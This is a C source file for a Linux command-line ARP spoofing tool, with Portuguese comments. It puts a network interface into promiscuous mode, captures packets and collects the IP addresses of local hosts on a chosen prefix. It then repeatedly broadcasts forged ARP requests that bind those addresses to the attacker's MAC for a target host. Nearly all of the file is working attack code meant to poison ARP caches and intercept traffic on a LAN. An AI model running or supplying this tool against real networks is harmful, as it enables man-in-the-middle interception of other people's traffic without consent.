#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <netinet/if_ether.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <linux/if_packet.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include "Defines.h"
#include "GeneralTypes.h"
#include "util.h"

/* Definies gerais. */
#define BUFFER_SIZE	2048

/* Variveis globais. */
unsigned char g_localInterfaceMAC[ETH_ALEN]	=	{0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
unsigned char g_broadcastMAC[ETH_ALEN] 		= 	{0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
int g_localInterfaceIndex			=	-1;
in_addr_t spoofedHostsIPs[255];

void printUsage(char *_programName)
{
	printf("%s -i <interface> -n <network prefix> -t <target IP (for spoofed ARP request)>\n", _programName);
}

BOOLEAN setPromiscuous(char *_interface, int _sock)
{
	const char *PROCEDURE = "setPromiscuous";

	struct ifreq ifr;

	/* Tenta obter as flags atuais da interface. */
	strncpy(ifr.ifr_name, _interface, strlen(_interface)+1);
	if((ioctl(_sock, SIOCGIFFLAGS, &ifr) == -1))
	{
		/* No foi possvel salvar as flags da interface. */
		inform(DEFAULT_ERROR_FILE, PROCEDURE, "Couldn't get flags of interface %s: %s", _interface, strerror(errno));
		exit(RETURN_FALSE);
	}

	/* Tenta obter o endereo MAC da interface. */
        ifr.ifr_ifindex = if_nametoindex(ifr.ifr_name);
	if((ioctl(_sock, SIOCGIFHWADDR, &ifr) == -1))
	{
		/* No foi possvel obter endereo MAC da interface. */
		inform(DEFAULT_ERROR_FILE, PROCEDURE, "Couldn't get MAC address of the interface %s: %s", _interface, strerror(errno));
		exit(RETURN_FALSE);
	}
	g_localInterfaceIndex = if_nametoindex(ifr.ifr_name);
        memcpy(g_localInterfaceMAC, ifr.ifr_hwaddr.sa_data, ETH_ALEN);

	/* Coloca a interface em modo promscuo. */
	ifr.ifr_flags = ifr.ifr_flags | IFF_PROMISC;
	if (ioctl(_sock, SIOCSIFFLAGS, &ifr) == -1 )
	{
		/* No foi possvel colocar a interface em modo promscuo. */
		inform(DEFAULT_ERROR_FILE, PROCEDURE, "Couldn't put interface %s in promiscuous mode: %s", _interface, strerror(errno));
		exit(RETURN_FALSE);
	}

	inform(DEFAULT_OUT_FILE, PROCEDURE, "Interface %s successfuly put in promiscuous mode.", _interface);

	return(RETURN_TRUE);
}

int createRawSocket(void)
{
	const char *PROCEDURE = "createRawSocket";

	int sock;

	/* Tenta criar um raw socket. */
	if((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0)
	{
		/* No foi possvel criar um raw socket. */
		inform(DEFAULT_ERROR_FILE, PROCEDURE, "Couldn't create a raw socket: %s", strerror(errno));
		exit(RETURN_FALSE);
	};
	
	return sock;
}

BOOLEAN compareMAC(unsigned char *_MAC1, unsigned char *_MAC2)
{
	if(	_MAC1[0] == _MAC2[0] &&
		_MAC1[1] == _MAC2[1] &&
		_MAC1[2] == _MAC2[2] &&
		_MAC1[3] == _MAC2[3] &&
		_MAC1[4] == _MAC2[4] &&
		_MAC1[5] == _MAC2[5])
	{
		return RETURN_TRUE;
	}
	else
	{
		return RETURN_FALSE;
	}
}

//BOOLEAN sendARPSpoofPacket(int _socket, unsigned char _srcHardwareAddress[ETH_ALEN], unsigned char *_srcProtocolAddress, unsigned char *_targetProtocolAddress)
BOOLEAN sendARPSpoofPacket(int _socket, unsigned char _srcHardwareAddress[ETH_ALEN], in_addr_t *_srcProtocolAddress, in_addr_t *_targetProtocolAddress)
{
	/*************************************************************************************************/
	/*
		Consulta:		

		http://www.cs.sjsu.edu/faculty/stamp/students/Silky_report.pdf
		http://www.cs.vu.nl/~cn/arp.c
		http://www.physics.ohio-state.edu/~clkim/ddu/sock.txt
	*/
	/*************************************************************************************************/

	char ethernetPacketBuffer[ETH_FRAME_LEN];
	struct ethhdr ethernetHeader;
	struct ether_arp arpPacket;
	struct sockaddr_ll packetDestination;

	/* Preenche o cabealho Ethernet. */
	bzero(&ethernetHeader, sizeof(ethernetHeader));
	memcpy(&ethernetHeader.h_source, _srcHardwareAddress, ETH_ALEN);
	memcpy(&ethernetHeader.h_dest, g_broadcastMAC, ETH_ALEN); 
	ethernetHeader.h_proto = htons(ETH_P_ARP);

	/* Monta o pacote de resposta ARP. */
	bzero(&arpPacket, sizeof(arpPacket));
	(arpPacket.ea_hdr).ar_hrd = htons(ARPHRD_ETHER);
	(arpPacket.ea_hdr).ar_pro = htons(ETH_P_IP);
	(arpPacket.ea_hdr).ar_hln = ETH_ALEN;
	(arpPacket.ea_hdr).ar_pln = 4;
	(arpPacket.ea_hdr).ar_op = htons(ARPOP_REQUEST);
	memcpy(arpPacket.arp_sha, _srcHardwareAddress, ETH_ALEN);
	memcpy(arpPacket.arp_spa, _srcProtocolAddress, sizeof(_srcProtocolAddress));
	memset(arpPacket.arp_tha, '\0', ETH_ALEN);
	memcpy(arpPacket.arp_tpa, _targetProtocolAddress, sizeof(_targetProtocolAddress));

	/* Monta o pacote Ethernet. */
	bzero(&ethernetPacketBuffer, sizeof(ethernetPacketBuffer));
	memcpy(&ethernetPacketBuffer, &ethernetHeader, sizeof(ethernetHeader));
	memcpy(ethernetPacketBuffer+sizeof(ethernetHeader), &arpPacket, sizeof(arpPacket));
	memset(ethernetPacketBuffer+sizeof(ethernetHeader)+sizeof(arpPacket), '\0', 18); /* Padding. */

	/* Define o destino do pacote. */
	packetDestination.sll_family = AF_PACKET;
	packetDestination.sll_ifindex = g_localInterfaceIndex;
	packetDestination.sll_halen = ETH_ALEN;
	memcpy(&packetDestination.sll_addr, g_broadcastMAC, ETH_ALEN);
	
	/* Envia pacote. */
	if(sendto(_socket, &ethernetPacketBuffer, sizeof(ethernetHeader)+sizeof(arpPacket)+18, 0, (struct sockaddr *)&packetDestination, sizeof(packetDestination)) < 0)
	{
		printf("Couldn't sent ARP spoof packet: %s\n", strerror(errno));
	
		return RETURN_FALSE;
	}
	else
	{
		/* Imprime pacote enviado. */
		printf("* ARP spoof packet sent.\n");

		printf("* Ethernet [");
		printf("source MAC=%.2x:%.2x:%.2x:%.2x:%.2x:%.2x", ethernetHeader.h_source[0], ethernetHeader.h_source[1], ethernetHeader.h_source[2], ethernetHeader.h_source[3], ethernetHeader.h_source[4], ethernetHeader.h_source[5]);
		printf(", destination MAC=%.2x:%.2x:%.2x:%.2x:%.2x:%.2x", ethernetHeader.h_dest[0], ethernetHeader.h_dest[1], ethernetHeader.h_dest[2], ethernetHeader.h_dest[3], ethernetHeader.h_dest[4], ethernetHeader.h_dest[5]);
		printf(", protocol=ARP (0x%x)", ntohs(ethernetHeader.h_proto));
		printf("]\n");

		printf("* ARP [");
		printf("hardware type=Ethernet (0x%x)", ntohs((arpPacket.ea_hdr).ar_hrd));
		printf(", protocol type=IP (0x%x)", ntohs((arpPacket.ea_hdr).ar_pro));
		printf(", hardware address length=%d", (arpPacket.ea_hdr).ar_hln);
		printf(", protocol address length=%d", (arpPacket.ea_hdr).ar_pln);
		printf(", operation=Request (0x%d)", ntohs((arpPacket.ea_hdr).ar_op));
		printf(", source MAC=%.2x:%.2x:%.2x:%.2x:%.2x:%.2x", arpPacket.arp_sha[0], arpPacket.arp_sha[1], arpPacket.arp_sha[2], arpPacket.arp_sha[3], arpPacket.arp_sha[4], arpPacket.arp_sha[5]);
		printf(", source protocol address=%d.%d.%d.%d", arpPacket.arp_spa[0], arpPacket.arp_spa[1], arpPacket.arp_spa[2], arpPacket.arp_spa[3]);
		printf(", target MAC=%.2x:%.2x:%.2x:%.2x:%.2x:%.2x", arpPacket.arp_tha[0], arpPacket.arp_tha[1], arpPacket.arp_tha[2], arpPacket.arp_tha[3], arpPacket.arp_tha[4], arpPacket.arp_tha[5]);
		printf(", target protocol address=%d.%d.%d.%d", arpPacket.arp_tpa[0], arpPacket.arp_tpa[1], arpPacket.arp_tpa[2], arpPacket.arp_tpa[3]);
		printf("]\n\n");

		return RETURN_TRUE;
	}
}

int main(int argc, char *argv[])
{
	const char *PROCEDURE = "main";

	int parameter, sock, bytesReceived, aux;
	char *interface, *network, *targetIP, *lastOctet, buffer[BUFFER_SIZE], *p_srcIP, srcIP[20], *p_dstIP, dstIP[20];

	BOOLEAN i_parameter = RETURN_FALSE; 
	BOOLEAN n_parameter = RETURN_FALSE; 
	BOOLEAN t_parameter = RETURN_FALSE; 

	/* Cabealhos dos protocolos. */
	struct ethhdr *ether;
	struct ether_arp *arp;
	struct ip *ip; 	

	/* Verifica parmetros. */
	while ((parameter = getopt(argc, argv, "i:n:t:")) != -1)
	{
		switch(parameter)
		{
			case 'i':
				i_parameter = RETURN_TRUE;
				interface = optarg;
				break;
			case 'n':
				n_parameter = RETURN_TRUE;
                                network = optarg;
                                break;
			case 't':
				t_parameter = RETURN_TRUE;
                                targetIP = optarg;
                                break;
			case ':':
				printUsage(argv[0]);
				exit(RETURN_FAILURE);
				break;
			case '?':
				printUsage(argv[0]);
				exit(RETURN_FAILURE);
				break;
			default:
				break;
		}
	}

	if(i_parameter == RETURN_FALSE)
	{
		printUsage(argv[0]);
		exit(RETURN_FAILURE);
	}
	
	if(n_parameter == RETURN_FALSE)
	{
		printUsage(argv[0]);
		exit(RETURN_FALSE);
	}

	if(t_parameter == RETURN_FALSE)
	{
		printUsage(argv[0]);
		exit(RETURN_FALSE);
	}

	/* Tenta criar um raw socket. */
	sock = createRawSocket();

	/* Tenta colocar a interface em modo promscuo. */
	setPromiscuous(interface, sock); 

	/* Inicializa a lista de spoofed hosts. */
	for(aux=0; aux < 255; aux++)
	{
		spoofedHostsIPs[aux] = 0;
	}

//spoofedHostsIPs[0] = inet_addr("192.168.3.192");	
//printf("%d", (spoofedHostsIPs[0]));
//spoofedHostsIPs[1] = inet_addr("192.168.3.1");	
//sendARPSpoofPacket(sock, g_localInterfaceMAC, &spoofedHostsIPs[0], &spoofedHostsIPs[1]);

//spoofedHostsIPs[0] = inet_addr("192.168.3.193");	
//sendARPSpoofPacket(sock, g_localInterfaceMAC, &spoofedHostsIPs[0], &spoofedHostsIPs[1]);
//exit(1);

	/* Lao de captura dos pacotes. */
	spoofedHostsIPs[0] = inet_addr(targetIP);
	while(1)
	{
		/* Verifica se deve enviar os pacotes ARP spoof. */
			/* Envia pacotes ARP spoof para todos os hosts da lista. */
			for(aux=1; aux < 255; aux++)
			{
				if(spoofedHostsIPs[aux] != 0)
				{
					sendARPSpoofPacket(sock, g_localInterfaceMAC, &spoofedHostsIPs[aux], &spoofedHostsIPs[0]);
				}
			}
			
		/* Recebe pacote. */
		bzero(&buffer, sizeof(buffer));
		bytesReceived = recvfrom(sock, buffer, sizeof(buffer), 0, NULL, NULL);
		if(bytesReceived == -1)
		{
			/* Ocorreu um erro ao receber o pacote. */
			continue;
		}

		/* Imprime total de bytes recebidos. */
		printf("Bytes received=%d\n", bytesReceived);

		/* Extrai e imprime informaes do protocolo de enlace. */
		ether = (struct ethhdr *)buffer;
		printf("Ethernet [source MAC=%.2x:%.2x:%.2x:%.2x:%.2x:%.2x, ", ether->h_source[0], ether->h_source[1], ether->h_source[2], ether->h_source[3], ether->h_source[4], ether->h_source[5]);
		printf("destination MAC=%.2x:%.2x:%.2x:%.2x:%.2x:%.2x", ether->h_dest[0], ether->h_dest[1], ether->h_dest[2], ether->h_dest[3], ether->h_dest[4], ether->h_dest[5]);
		if(compareMAC(g_localInterfaceMAC, ether->h_dest) == RETURN_TRUE)
		{
			printf(" (This host), ");
		}
		else if(compareMAC(g_broadcastMAC, ether->h_dest) == RETURN_TRUE)
		{
			printf(" (Broadcast), ");
		}
		else
		{
			printf(", ");
		}
		
		/* Verifica qual  o protocolo de rede. */
		if(ntohs(ether->h_proto) == ETH_P_IP)
		{
			/* IP. */
			printf("protocol=%s]\n", "IP");

			/* Extrai e imprime informaes do protocolo de rede. */
			ip = (struct ip *)(buffer+sizeof(struct ethhdr));
			/*
			Curiosidade: existe um problema com inet_ntoa(), imprime valores iguais para duas chamadas seguidas com parmetros diferentes (ip_src e ip_dst por exemplo), maiores informaes em http://www.developerweb.net/sock-faq/detail.php?id=188.
			*/
			p_srcIP = inet_ntoa(ip->ip_src);
			strncpy(&srcIP, p_srcIP, sizeof(srcIP));
			p_dstIP = inet_ntoa(ip->ip_dst); 
			strncpy(&dstIP, p_dstIP, sizeof(dstIP));
			printf("IP [version=%d, header length=%d, TOS=%d, total length=%d, id=%d, flags=-, offset=%d, TTL=%d, protocol=%s, checksum=%d, source=%s, destination=%s]", ip->ip_v, ip->ip_hl, ip->ip_tos, ip->ip_len, ip->ip_id, ip->ip_off, ip->ip_ttl, getprotobynumber(ip->ip_p)->p_name, ip->ip_sum, srcIP, dstIP);

			/* Verifica se o host que enviou o pacote pertence a nossa rede. */
			if(strncmp(network, srcIP, strlen(network)) == 0)
			{
				/* Verifica se o host j foi inserido na lista. */
				lastOctet = strrchr(srcIP, '.');
				lastOctet += 1;
				if(spoofedHostsIPs[atoi(lastOctet)] == 0)
				{
					spoofedHostsIPs[atoi(lastOctet)] = inet_addr(srcIP);
					printf("\n(IP %s inserted in the spoof list. It will be spoofed soon.)", srcIP);
				}
			}
		}
		else if(ntohs(ether->h_proto) == ETH_P_ARP)
		{
			/* ARP. */
			printf("protocol=%s]\n", "ARP");

			/* Extrai e imprime informaes do protocolo de rede. */
			arp = (struct ether_arp *)(buffer+sizeof(struct ethhdr));
			if(ntohs((arp->ea_hdr).ar_op) == ARPOP_REQUEST)
			{
				printf("ARP [operation=%s]", "Request");
			}
			else if(ntohs((arp->ea_hdr).ar_op) == ARPOP_REPLY)
			{
				printf("ARP [operation=%s]", "Reply");
			}
			else
			{
				printf("ARP [operation=%s]", "(Other)");
			}
		}
		else
		{
			/* Outro. */
			printf("protocol=%s]\n", "(Other)");
		}

		/* Finaliza impresso do pacote. */	
		printf("\n\n");
	}

	return RETURN_SUCCESS;
}

